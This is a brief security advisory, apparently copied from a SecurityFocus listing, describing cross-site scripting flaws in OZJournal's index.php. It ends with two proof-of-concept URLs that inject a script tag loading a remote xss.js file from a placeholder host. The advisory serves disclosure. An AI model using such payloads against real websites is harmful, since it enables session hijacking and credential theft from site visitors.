8 lines
No EOL
766 B
Text
Executable file
8 lines
No EOL
766 B
Text
Executable file
source: http://www.securityfocus.com/bid/19311/info
|
|
|
|
OZJournal is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
|
|
|
|
http://www.example.com/index.php?show=archives&y=2006&m=<script%20src=http://www.example.com/xss.js></script>
|
|
http://www.example.com/index.php?show=archives&c=http://www.example.com/index.php?show=archives&c=<script%20src=http://www.example.com/xss.js></script> |